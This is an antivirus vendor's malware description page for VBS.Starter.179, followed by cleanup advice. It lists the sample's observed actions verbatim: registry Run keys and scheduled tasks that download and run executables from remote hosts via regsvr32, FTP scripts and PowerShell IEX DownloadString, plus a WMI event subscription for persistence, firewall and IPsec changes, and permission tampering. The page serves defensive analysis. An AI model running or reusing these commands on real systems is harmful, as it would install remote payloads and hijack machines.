Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

VBS.Starter.179

Added to the Dr.Web virus database: 2019-10-29

Virus description added:

Technical Information

To ensure autorun and distribution
Modifies the following registry keys
  • [<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'start' = 'regsvr32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vid001.exe] 'Debugger' = 'ntsd -d'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uihost64.exe] 'Debugger' = 'ntsd -d'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uihost32.exe] 'Debugger' = 'ntsd -d'
Creates or modifies the following files
  • <SYSTEM32>\tasks\mysa
  • <SYSTEM32>\tasks\mysa1
  • <SYSTEM32>\tasks\mysa2
  • <SYSTEM32>\tasks\mysa3
  • <SYSTEM32>\tasks\ok
  • <SYSTEM32>\tasks\microsoftwindows
Creates the following services
  • [<HKLM>\System\CurrentControlSet\Services\MpsSvc] 'Start' = '00000002'
  • [<HKLM>\System\CurrentControlSet\Services\PolicyAgent] 'Start' = '00000002'
Malicious functions
Executes the following
  • '%WINDIR%\syswow64\net.exe' stop AnyDesk
  • '%WINDIR%\syswow64\taskkill.exe' /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.e...
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
Downloads
  • http://22#.##.247.152:8152/batpower.txt
Modifies file system
Creates the following files
  • %WINDIR%\inf\n.vbs
  • %WINDIR%\inf\c3a.bat
Deletes the following files
  • %WINDIR%\inf\n.vbs
Modifies the HOSTS file.
Miscellaneous
Searches for the following windows
  • ClassName: 'EDIT' WindowName: ''
  • ClassName: '' WindowName: ''
Creates and executes the following
  • '%WINDIR%\syswow64\wscript.exe' "%WINDIR%\inf\n.vbs"
  • '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\inf\c3a.bat" "' (with hidden window)
Executes the following
  • '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\inf\c3a.bat" "
  • '%WINDIR%\syswow64\sc.exe' delete "Rssphs zxsxavyaobwa"
  • '%WINDIR%\syswow64\net1.exe' stop "WinTcpAutoProxyStc"
  • '%WINDIR%\syswow64\sc.exe' delete "WinTcpAutoProxyStc"
  • '%WINDIR%\syswow64\net1.exe' stop "Ws5oq3qwi gyogazxcwce"
  • '%WINDIR%\syswow64\sc.exe' delete "Ws5oq3qwi gyogazxcwce"
  • '%WINDIR%\syswow64\net1.exe' stop "Wshrhx qlyndxmcsiuf7f"
  • '%WINDIR%\syswow64\sc.exe' delete "Wshrhx qlyndxmcsiuf7f"
  • '%WINDIR%\syswow64\schtasks.exe' /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe %WINDIR%\update.exe>>s&echo bye>>s&ftp -s:s&%WINDIR%\update.exe" /ru "system"...
  • '%WINDIR%\syswow64\schtasks.exe' /create /tn "Mysa1" /tr "rundll32.exe %WINDIR%\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
  • '%WINDIR%\syswow64\schtasks.exe' /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat %WINDIR%\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system" /sc onstart /F
  • '%WINDIR%\syswow64\schtasks.exe' /create /tn "Mysa3" /tr "cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar %WINDIR%\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&%WINDIR%\help\lsmosee.exe" /ru "sys...
  • '%WINDIR%\syswow64\sc.exe' delete "Rsisem eqawcgyjqi"
  • '%WINDIR%\syswow64\net1.exe' stop "Rssphs zxsxavyaobwa"
  • '%WINDIR%\syswow64\schtasks.exe' /create /tn "ok" /tr "rundll32.exe %WINDIR%\debug\ok.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\svchost.exe'" delete
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\wininit.exe'" delete
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\csrss.exe'" delete
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\WUDFHosts.exe'" delete
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='services.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\services.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\services.exe'" delete
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "name='lsass.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\lsass.exe'" delete
  • '%WINDIR%\syswow64\wbem\wmic.exe' datafile where "Name='c:\\windows\\debug\\lsmos.exe'" get Version /value
  • '%WINDIR%\syswow64\findstr.exe' "=1\.0\.0\.1$"
  • '%WINDIR%\syswow64\cmd.exe' /c wmic process where "ExecutablePath='c:\\windows\\debug\\lsmos.exe'" get ProcessId|findstr "[0-9]"
  • '%WINDIR%\syswow64\wbem\wmic.exe' process where "ExecutablePath='c:\\windows\\debug\\lsmos.exe'" get ProcessId
  • '%WINDIR%\syswow64\findstr.exe' "[0-9]"
  • '%WINDIR%\syswow64\schtasks.exe' /create /tn "MicrosoftWindows" /tr "%WINDIR%\help\spoolys.exe" /ru "system" /sc onstart /F
  • '%WINDIR%\syswow64\schtasks.exe' /run /tn MicrosoftWindows
  • '%WINDIR%\syswow64\net1.exe' stop "Rsisem eqawcgyjqi"
  • '%WINDIR%\syswow64\net1.exe' stop "gyoidf2wl2cw8ce"
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "OfficeUpdaterA" /F
  • '%WINDIR%\syswow64\cmd.exe' /c net1 stop ASBservice
  • '%WINDIR%\syswow64\net1.exe' stop ASBservice
  • '%WINDIR%\syswow64\sc.exe' delete ASBservice
  • '%WINDIR%\syswow64\net1.exe' stop msupdate
  • '%WINDIR%\syswow64\sc.exe' delete msupdate
  • '%WINDIR%\syswow64\net1.exe' stop clr_optimization_v4.0.30328_64
  • '%WINDIR%\syswow64\sc.exe' delete clr_optimization_v4.0.30328_64
  • '%WINDIR%\syswow64\net1.exe' stop MicrosoftMsql
  • '%WINDIR%\syswow64\sc.exe' delete MicrosoftMsql
  • '%WINDIR%\syswow64\net1.exe' stop netsv
  • '%WINDIR%\syswow64\sc.exe' delete netsv
  • '%WINDIR%\syswow64\net1.exe' stop NetworkServices
  • '%WINDIR%\syswow64\sc.exe' delete NetworkServices
  • '%WINDIR%\syswow64\net1.exe' stop "Network Remote"
  • '%WINDIR%\syswow64\sc.exe' delete "Network Remote"
  • '%WINDIR%\syswow64\net1.exe' stop "WinTaskCtrlService"
  • '%WINDIR%\syswow64\sc.exe' delete "WinTaskCtrlService"
  • '%WINDIR%\syswow64\net1.exe' stop remotecall
  • '%WINDIR%\syswow64\sc.exe' delete remotecall
  • '%WINDIR%\syswow64\net1.exe' stop rpcept
  • '%WINDIR%\syswow64\sc.exe' delete rpcept
  • '%WINDIR%\syswow64\net1.exe' stop csrss
  • '%WINDIR%\syswow64\sc.exe' delete csrss
  • '%WINDIR%\syswow64\net1.exe' stop "windows audio control"
  • '%WINDIR%\syswow64\sc.exe' delete "windows audio control"
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "WindowsUpdate1" /F
  • '%WINDIR%\syswow64\net.exe' start MSSQLSERVER
  • '%WINDIR%\syswow64\sc.exe' delete "gyoidf2wl2cw8ce"
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\drivers\taskmgr.exe /e /d system
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "\Microsoft\Windows\RAC\BackUpEvent" /F
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filteraction name=Allow action=permit
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filteraction name=deny action=block
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
  • '%WINDIR%\syswow64\netsh.exe' ipsec static set policy name=win assign=y
  • '%WINDIR%\syswow64\cmd.exe' /S /D /c" ver "
  • '%WINDIR%\syswow64\find.exe' "5.1."
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="coronav" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="coronav2" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="coronav2" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='coronav2'" DELETE
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckamm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE ...
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckamm4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wm...
  • '%WINDIR%\syswow64\cmd.exe' /c start wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
  • '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uihost32.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
  • '%WINDIR%\syswow64\net1.exe' start MSSQLSERVER
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add policy name=win
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "at6" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Windows_Update" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Update" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Update2" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Update4" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Update3" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "windowsinit" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "System Security Check" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "AdobeFlashPlayer" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "updat_windows" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "at1" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "at2" /F
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Enterprise]" /F
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /TN "\Microsoft\Windows\UPnP\Services" /f
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Standard]" /F
  • '%WINDIR%\syswow64\sc.exe' config MpsSvc start= auto
  • '%WINDIR%\syswow64\net.exe' start MpsSvc
  • '%WINDIR%\syswow64\net1.exe' start MpsSvc
  • '%WINDIR%\syswow64\netsh.exe' ipsec static delete policy name=win
  • '%WINDIR%\syswow64\netsh.exe' ipsec static delete filterlist name=Allowlist
  • '%WINDIR%\syswow64\netsh.exe' ipsec static delete filterlist name=denylist
  • '%WINDIR%\syswow64\netsh.exe' ipsec static delete filteraction name=allow
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="tcp all" dir=in
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="deny tcp 445" dir=in
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="deny tcp 139" dir=in
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="tcpall" dir=out
  • '%WINDIR%\syswow64\netsh.exe' advfirewall set allprofiles state on
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filterlist name=Allowlist
  • '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "WindowsUpdate3" /F
  • '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uihost64.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
  • '%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vid001.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
  • '%WINDIR%\syswow64\reg.exe' delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "SHELL" /f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming\*.exe /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming\*.exe /e /g system:f
  • '%WINDIR%\syswow64\cacls.exe' C:\SysData\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Msupdate /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\xcecg /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\ccm /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\smss.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%CommonProgramFiles%\Services\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\a.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\security\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\security\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Resources\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Resources\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Resources\Themes\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Resources\Themes\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\system\lsmsm.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\homegroup\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\diskdata\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles%\Microsoft Updates" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\servwdrv.dll /e /d system
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\servwdrv.dll /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\servwdrvx.dll /e /d system
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\servwdrvx.dll /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\serwwdrv.dll /e /d system
  • '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\serwwdrv.dll /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\administrator\AppData\Local\Temp /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Local\Temp\*.exe /e /g everyone:f
  • '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\svchost.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\administrator\AppData\Local\Temp /e /g system:f
  • '%WINDIR%\syswow64\net1.exe' user admin$a /del
  • '%WINDIR%\syswow64\net1.exe' user sysadm05 /del
  • '%WINDIR%\syswow64\net1.exe' stop AnyDesk
  • '%WINDIR%\syswow64\sc.exe' config AnyDesk start= disabled
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\Default\AppData\Local\Temp\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\Default\AppData\Roaming\Tempo\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\Default\AppData\Roaming\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\asp\AppData\Local\Temp\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\asp\AppData\Roaming\Tempo\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\asp\AppData\Roaming\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\administrator\AppData\Local\Temp\*.exe
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\administrator\AppData\Roaming\Tempo\*.exe
  • '%WINDIR%\syswow64\net1.exe' user mm123$ /del
  • '%WINDIR%\syswow64\attrib.exe' -s -h -r C:\Users\administrator\AppData\Roaming\*.exe
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\administrator\AppData\Roaming\Tempo /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\administrator\AppData\Roaming\Tempo /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming\Tempo /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming\Tempo /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\asp\AppData\Roaming\*.exe /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\administrator\AppData\Roaming /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\asp\AppData\Local\Temp /e /g system:f
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\asp\AppData\Local\Temp /e /g everyone:f
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\debug\WIA\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Local\Temp /e /g everyone:f
  • '%WINDIR%\syswow64\netsh.exe' ipsec static add filterlist name=denylist
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\WmiAppSrv\svchost.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\Microsoft\WmiAppSvr\csrss.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\Temp\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Public\Music\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Public\Music\*.vbs /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Help\lsass.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\temp\*.dll /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\debug\Nat\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Registration\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %APPDATA%\Tempo\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles(x86)%\Microsoft Blliasc\*.*" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\syswow64\lsass.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\system\lsaus.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\clr_optimization_v4.0.30318_64\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\Microsoft\clr_optimization_v4.0.30318_64\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%PROGRAMDATA%\CodeGear\Microsoft Office\DataFiles\Windows\Config\Microsoft\Images\Bugger\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\Microsoft\HelpLibrary\*.dll /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\WBEM\ccproxy\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\Microsoft\Network\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\mysql.log /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Fonts\Msql\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Media\Delta\aaf\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\wtcs.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\admin\AppData\Roaming\TempoRX\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\administrator\AppData\Roaming\TempoRX\*.exe /e /d everyone
  • '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.###1202.site:280/v.sct scrobj.dll" /f
  • '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.###1202.site:280/v.sct scrobj.dll" /f
  • '%WINDIR%\syswow64\reg.exe' delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v "start1" /f
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Help\taskhost.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Fonts\Windows\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Web\wininit.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\temp\svchost.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\Users\Default\AppData\Roaming /e /g system:f
  • '%WINDIR%\syswow64\cacls.exe' %CommonProgramFiles%\svshpst.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\fonts\system32\svchost.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\fonts\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Fonts\Microsoft /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%WINDIR%\fonts\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\taskmgrs.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\security\IIS\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %CommonProgramFiles%\System\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %ProgramFiles%\dll\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %CommonProgramFiles%\Services\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %CommonProgramFiles%\SpeechEngines\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Fonts\system32\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SpeechsTracing\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles(x86)%\Microsoft SvidiaTen\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %CommonProgramFiles%\Microsoft Shared\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' C:\System\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\1\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' c:\users\public\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%CommonProgramFiles%\conime.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%CommonProgramFiles(x86)%\conime.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %ProgramFiles%\test\*.exe /e /d everyone
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Fonts\help\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\web\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' "%ProgramFiles%\SQLWriter$\*.exe" /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Prefetch\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %PROGRAMDATA%\WmiAppSvr\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Fonts\Mysql\*.exe /e /d system
  • '%WINDIR%\syswow64\cacls.exe' %WINDIR%\SysWOW64\drivers\svchost.exe /e /d system
  • '%WINDIR%\syswow64\cmd.exe' /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://22#.##.247.152:8152/batpower.txt')

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

